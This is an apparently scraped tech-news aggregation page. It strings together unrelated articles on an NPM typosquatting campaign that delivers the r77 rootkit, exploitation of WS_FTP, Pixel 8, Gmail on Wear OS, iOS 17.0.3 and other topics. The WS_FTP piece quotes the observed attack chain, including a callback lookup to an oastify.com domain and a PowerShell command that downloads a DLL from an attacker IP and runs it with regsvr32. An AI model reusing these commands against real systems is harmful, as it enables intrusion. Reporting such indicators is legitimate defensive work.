NPM Typosquatting Attack Deploys r77 Rootkit via Legitimate Package

0
[ad_1]

EXECUTIVE SUMMARY

  • ReversingLabs researchers have discovered a new typosquatting campaign exploiting the NPM platform.
  • Researchers observed a malicious NPM package called node-hide-console-windows delivering the r77 rootkit to innocent users.
  • Typosquatting is a deceptive method where cybercriminals create domain names and social media accounts using the same spelling as the original organization’s name.
  • 10 versions of the malicious NPM package were discovered. 
  • In this cybersquatting attack, scammers have exploited the legitimate package node-hide-console-window to deceive users.

ReversingLabs’ cybersecurity researchers have uncovered a malicious NPM package (node-hide-console-windows) created using typosquatting to resemble a legitimate NPM package called node-hide-console-window.

As evident, the attackers have added an ‘s’ in the title of the malicious package to separate it from the original one. The concerning part is that this malicious package has been downloaded over 700 times. This campaign started at the end of August 2023.

ReversingLabs revealed that when a user installs this malicious package, a Discord bot is downloaded that plants the open-source r77 rootkit. This rootkit hides itself within the OS to remain undetected and lets the attacker obtain complete control of the victim’s device.

Researchers examined the executable fetched by a file titled index.js, which turned out to be DiscordRAT 2.0. All ten versions of the malicious NPM package downloaded the same DiscordRAT2.0 executable. However, the last two versions contained an additional malicious payload disguised as a visual code update and fetched by index.js.

For your information, DiscordRAT 2.0 is a Discord Remote Administration Tool promoted for training purposes but is an open-source malware. Threat actors must register the bot with the Discord developer portal and add it to the Discord server or guild before deploying it. The guild ID is added to the DiscordRAT 2.0 executable and delivered to the victims through phishing email attachments or packages available on public repositories.

Further probing revealed that the Discord guild for the malware was launched on August 15, just 10 days before the malicious NPM package’s first version was published. The executable creates a channel in the connected Discord server for each victim and sends the initial payload to the infected host.

From there, the bot receives additional commands from the attacker and can perform a range of tasks like disabling Windows Defender, blocking the victim’s mouse and keyboard, bluescreening the device, and killing processes. There’s a long list of commands it facilitates but most important is the ‘!rootkit’ command recently added to DiscordRAT 2.0 to launch the r77 rootkit on the infected device.

This open-source, fileless ring 3 toolkit features extensive documentation and can disguise files/processes. This rootkit hides itself within the OS to remain undetected and lets the attacker obtain complete control of the victim’s device.

It is worth noting that this is the first time researchers have identified a malicious NPM package that facilitates functionality. This indicates a need to secure open-source projects as cybercriminals are preferring to exploit them to distribute malware.

Attackers used other tactics to ensure developers added the malicious package to their applications, such as creating an NPM page similar to the legitimate package’s page. Moreover, just like the original package, the malicious one also featured 10 published versions.

In their blog post, researchers have noted an uptick in campaigns exploiting the NPM package register platform. In August 2023, ReversingLabs researchers discovered multiple malicious NPM packages linked to a campaign targeting cryptocurrency providers. 

Another NPM-related campaign was discovered in July 2023, targeting developers and end-users with malicious code that stole sensitive user data via fake Microsoft.com login forms and implanted credential-stealing scripts in apps that unintentionally incorporated NPM packages.

For your information, the original package (node-hide-console-window) is used to toggle the console window visibility of an application.

In order to protect yourself against typosquatting attacks, it is essential to check the addresses while typing or searching for addresses/packages online so that you visit the original site/repository.

In addition, closely inspect the package’s name and description before installing. Install a reliable security solution to detect/block malicious packages timely. If you suspect your device is infected with the r77 rootkit, quickly run a system scam using a reliable antivirus and change the passwords for all accounts, especially banking passwords.

  1. Luna Grabber Malware Hits Roblox Devs Through npm Packages
  2. 6 official Python repositories plagued with cryptomining malware
  3. CISA warns of trojanized versions of JavaScript library’s NPM package
  4. VMCONNECT: Malicious PyPI Package Mimicking Common Python Tools
  5. Crypto Discord Communities Targeted by Malicious Bookmarks & JavaScript

[ad_2]
Source link

Google Pixel 8 wallpapers are available to download

0
[ad_1]

Google announced its new Android flagships yesterday, the Pixel 8 and Pixel 8 Pro, and their wallpapers are now available to download. These wallpapers have been shared by Android Authority.

The Google Pixel 8 and Pixel 8 Pro wallpapers are now available to download

These wallpapers are actually specifically made to color-match the Pixel 8 and Pixel 8 Pro models. Google announced Bay, Hazel, Obsidian, Porcelain, and Rose color variants of its new flagships. Well, some of these colors are exclusive to one device, like Bay for the Pixel 8 Pro, for example.

In any case, the point is that these colors are kind of made for the colors of the phones. Andrew Zuckerman created them, and the theme he used is ‘Minerals’. You can check out all the wallpapers in the gallery below, and you’ll immediately realize why the theme is ‘Minerals’.

Now, do note that the images shown in the gallery are compressed, just to show you what you’re getting. If you’d like to grab them in their full size, you’ll need to tap the link below the article.

Once you download them, setting the wallpaper is easy, just do it like you’d do it with any other image. You can either long-press on an empty spot on your home screen, do it via the Settings, or directly from the gallery. It’s up to you.

The Pixel 8 series phones do look quite similar to their predecessors

Now, the Pixel 8 and Pixel 8 Pro do resemble their predecessors quite a bit, but there are some changes. They’re both quite curvy, and the Pixel 8 Pro now has a flat display too. The Pixel 8 is smaller than its predecessor, and also lighter.

Google improved the SoC here, both phones are fueled by the Tensor G3. The cameras have also been improved, though the Pixel 8 Pro comes with most improvements in that regard. It even has some exclusive software features.

Android 14 comes pre-installed on both phones, while it has also started to roll out to a bunch of other Pixel phones.

Download Google Pixel 8 series wallpapers


[ad_2]
Source link

Google alters search queries to get you to buy stuff: Report

0
[ad_1]

Google is currently involved in an antitrust trial with the DoJ, and new info from the courtroom just keeps on coming. Wired shared a rather interesting report from the courtroom, revealing how Google alters search queries in order to get you to buy stuff.

New testimony shows us how Google alters search queries to get you to buy stuff

This reveal occurred while one of the company’s employees was on the stand. He basically revealed how Google boosts its profit by messing with search queries.

Now, the whole affair has to do with the so-called ‘Project Mercury’, which is allegedly “highly confidential”. This whole project is about generating more advertising revenue on the search engine results page (SERP).

The projector screen in the courtroom showed an internal Google slide which details changes to its search algorithm. This slide showed us a “semantic matching” overhaul of Google’s SERP algorithm.

Now, when you submit a query, what you’d expect is a search engine to “incorporate synonyms into the algorithm, as well as text phrase pairings in natural language processing”, says Wired. However, thanks to Google changes, things went way further. Google’s algorithm seems to have altered queries to generate more commercial results.

Google presumably does this “billions of times a day” in “trillions of different variations”

Wired assumes that Google alters queries “billions of times a day in trillions of different variations”. This way, shopping is always very close to your eyes, and just a click away, kind of. We don’t know how long has Google been doing this, though.

This trial started on September 12, and it’s expected to last for about two months. We’ve seen plenty of info thus far, even though it’s a semi-closed trial. We only get bits and pieces of what’s going on.

A number of high-profile people from the industry already testified, such as Satya Nadella, Microsoft’s CEO,, who took the stand recently. You can read more about the trial in our Google vs DoJ article, which is constantly updated.


[ad_2]
Source link

Gmail finally arrived on Wear OS to improved your emailing experience

0
[ad_1]

Over the past few months, there have been talks of having Gmail on Wear OS, and it’s finally coming true. This is big news for the wearable community as it will help users be more productive even when they have only their smartwatch. Bringing this productivity app to the Wear OS will allow users to reply, archive, and access their inbox like they would on a smartphone.

If you have a smartwatch running Wear OS 3 or 4, you can now install Gmail directly to your smartwatch. This improvement is coming with the launch of the new Google Pixel Watch 2, and it aims to improve productivity from the wrist. To get this app on their smartwatches, users need to head over to the Google Play Store on their smartphone and simply install it on their smartwatch.

Once it’s on their Wear OS, smartwatch, users can now be able to get more details on emails from their wrist. Previously, smartwatches running Wear OS only let Gmail notifications get delivered on the user’s wrist. This left the users the choice to keep the notification in mind for later or immediately pick up their smartphones to act upon the email.

Productivity is getting better with the arrival of Gmail on Wear OS smartwatches

Over the past few months, there have been rumours that Gmail was coming to Wear OS smartwatches. It’s great to finally see the app make its debut on Wear OS devices with the new Pixel Watch 2 entry. Other smartwatches that run either Wear OS 3 or 4 will be able to get this app for quick access to mail, hence improving productivity.

To get this app on your Wear OS smartwatch, you need to install it from your smartphone. Head over to the Google Play Store on your smartphone and search for the Gmail app. Once you’ve seen the app, check the ‘available on more devices’ section to install it on your smartwatch.

This section is just below the app install, open, and update buttons in the interface. Tap on the installation button next to your smartwatch and the Gmail app will be installed on your smartwatch for easy access and usage. Now, you won’t need to pull out your smartphone before you can reply to urgent emails and also organize your mailbox.

Aside from the Google Pixel smartwatches, the next to get this feature will be the Galaxy Watch series. Other smartwatch brands might get the feature a bit later than the options listed in the previous sentence. So if you have a Pixel Watch or a Galaxy Watch, you should start getting this feature as soon as possible.

This feature might attract most buyers out shopping for a new smartwatch to consider the Pixel Watch 2. Google just announced this new smartwatch along with the Pixel 8 series, and they are all stunning devices. Would you be willing to make use of Gmail on your Wear OS smartwatch to improve your productivity?


[ad_2]
Source link

New iOS 17 update is here to fix iPhone 15 Pro overheating

0
[ad_1]

As promised, Apple will try to fix the iPhone 15 Pro series overheating issues with a new iOS 17 update, and that update has now landed. We’re looking at an iOS 17.0.3 update here, and it’s rolling out.

The iPhone 15 Pro overheating issues could be fixed with a new iOS 17 update that just landed

There were a number of reports reporting iPhone 15 Pro and Pro Max overheating, in odd scenarios too. Some people actually experienced it while scrolling social media, others during phone calls, and some during more intensive tasks.

Apple blamed some bugs in iOS 17 for this, and also some app developers too. The company also mentioned heating that could happen with some USB-C chargers too. The company promised to address the issue in this update so it remains to be seen if it managed to do that.

The iPhone 15 Pro series does have a frame made out of titanium, which is not as good in terms of heat dissipation as aluminum, for example. The Apple A17 Pro chip is also immensely powerful.

This update also provides some security and bug fixes

Now, in the changelog, Apple notes that this update “provides important bug fixes, security updates, and addresses an issue that may cause iPhone to run warmer than expected”.

iOS 17 0 3 update

That is basically everything in terms of the changelog. The update itself weighs 423.2MB, and it should be available on your device in case you haven’t updated already.

Apple did release a separate report on the security fixes here. The company listed two fixes regarding both iOS and iPadOS. The first one is a fix for a kernel exploit, and the second is a fix for a libvpx bug, which allowed attackers remote access in specific situations.

So, this update is not just about the heating, even though it primarily is. It will take a couple of days to properly check whether the update helped or not. There were many reports suggesting this is (also) a hardware problem, so… it remains to be seen.


[ad_2]
Source link

Amazon axes live-audio streaming app Amp after just one year

0
[ad_1]

Giant corporations like Amazon, Apple, Google, and Microsoft are trying to increase their market share and diversify their products and services all the time. The easiest way is to acquire smaller companies that already own a particular product, but there’s also the possibility of pouring your resources into your own projects instead.Amp is a live-audio app that Amazon launched back in March 2022, which didn’t gain much popularity among creators. The service enabled users to become DJs by offering them all the tools needed, including music from major labels.

Unfortunately, Amazon announced plans to shut down the app/service probably because not enough people use it to justify the amount of resources it spends on it.

This decision was not made quickly or easily. It only became clear after months of careful consideration determining the investments Amazon wants to make for the future,” said Steve Boom, VP of Amazon Music, said in a memo reviewed by Bloomberg.

Amazon’s official went on to say that the company has learned a lot from Amp, such as how live-music communities interact and plans to add some of those experiences to Amazon Music. It remains to be seen in what form they will be introduced, unless this is just PR talk.

[ad_2]
Source link

Exploitation of Critical WS_FTP Server Flaw Spotted in the Wild

0
[ad_1]

As previously reported, Progress-owned WS_FTP was discovered with multiple vulnerabilities associated with cross-site scripting (XSS), SQL injection, cross-site request forgery, unauthenticated user enumeration, and a few others.

Progress has warned their users about the WS_FTP vulnerabilities and released a security advisory mentioning the fixed version of the WS_FTP server. Additionally, they have also requested their users to upgrade to the latest version.

Vulnerabilities Exploited in the Wild

According to the reports shared with Cyber Security News, these vulnerabilities were discovered to be exploited by threat actors in the wild. On investigating further, the exploit chain of execution was found to be the same across all the observed instances.

Document
FREE Demo

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

It was also mentioned that this could mean that there has been a mass exploitation of the vulnerable WS_FTP servers. The collected logs also consisted of one particular burp suite domain on all the recorded incidents which means that a single threat actor is doing the mass exploitation.

However, all the execution chain of commands has been listed below.

Great-grandparent Process:

C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\ryvjavth.cmdline

Parent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Windows\TEMP\RES6C8F.tmp” “c:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Child Process:

C:\Windows\System32\cmd.exe” /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

As per the reports, the Attack chain had the below command executions.

Great-grandparent Process:

C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\System32\cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Parent Process:

powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Child Process:

C:\Windows\System32\cmd.exe” /c regsvr32 c:\users\public\NTUSER.dll

Furthermore, a complete report has been published by Rapid7, which provides detailed information about the recorded incidents, mitigations, and other information.

Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.


[ad_2]
Source link

Slip your Pixel 8 or Pixel 8 Pro into an ultra slim Totallee case

0
[ad_1]

Google had a handful of really big announcements today including the rollout of Android 14, but most notably the Pixel 8 and Pixel 8 Pro. Totallee is wasting no time in making sure your device can be protected and still look uber sleek thanks its ultra slim Thin Pixel 8 and Pixel 8 Pro cases.

If you’re like some of us, you might really dislike phone cases because they bulk up the device. Not to mention they sometimes cover up the beauty of the phone’s design. In short they look bad. The nice thing about Totallee cases is that they’re designed to be incredibly slim. So as not to take away from the nice-looking design of the phone.

The one downside to this is that they won’t provide as much protection as some cases. When we say these are thin, we mean really thin. And unfortunately that comes at the cost of losing some drop protection. But, don’t run away just yet. Because that’s only a bad thing if you’re prone to dropping your phone all the time and from perhaps questionable heights. If you don’t have that issue and your phones tend to stay in pretty good condition, definitely consider these Totallee cases. Because they’re some of the thinnest out there.

Thin Totallee cases for the Pixel 8 series come in two colors

You’ve got two choices here for a really thin case. Black, and clear. They’re simple options but sometimes simplicity is best. You can snag either case from Amazon and they’ll set you back $39.

For that you’ll get a case that will protect your device from scratches as well as minor drops. Plus these cases are designed to fit your phone like a glove and not get loose over time. If you like sliding your phone into your pockets, these cases are perfect. Because they don’t bulk things up.

Totallee Thin Pixel 8 Case

Totallee Thin Pixel 8 Pro Case


[ad_2]
Source link

Research firm says Huawei’s Kirin 9000S isn’t a true 7nm chipset

0
[ad_1]

The launch of the Huawei Mate 60 Pro, featuring the 7nm 5G-enabled Kirin 9000S chip, has confused American officials because SMIC was decades behind the competition last year. However, according to a new report from the South China Morning Post, the Kirin 9000S might not be a 7nm chip after all.

Why is SMIC using 7nm technology important to the US?

In 2020, when the US imposed restrictions on Huawei, the company lost its ability to conduct business with almost all Western companies. While the US did allow Huawei to source the non-5G-enabled Qualcomm Snapdragon 8+ Gen 1, the company invested resources in developing chips with SMIC, which was still using the age-old 14nm node process.

However, the tables turned with the launch of the Kirin 9000S chip, as it was not only capable of accessing 5G services but also had performance on par with the 7nm chips. However, if true, this would have put SMIC in violation of the US sanctions. Moreover, with recent reports of the company stockpiling raw materials for the Kirin 9000S chip, it seemed that SMIC was preparing for stricter US sanctions.

How did Huawei achieve the performance?

According to the report, Minatake Mitchell Kashio, CEO of electronics research firm Fomalhaut Techno Solutions, explained that Kirin 9000S is not the true 7nm marvel it’s claimed to be but is, in fact, a product of SMIC’s 14nm process. Additionally, he highlighted that Huawei and SMIC used special techniques to enhance the chip’s performance, bringing it in line with the capabilities of a 7nm processor.

Therefore, the chip’s production didn’t breach U.S. sanctions, as SMIC had the capacity for 14nm chip manufacturing pre-ban. Moreover, it will also mean that the performance of the Huawei Mate 60 Pro isn’t as impressive as thought earlier. However, despite the report, the benchmark scores of the Kirin 9000S chips align with true 7nm chips, thus making the reports uncertain.


[ad_2]
Source link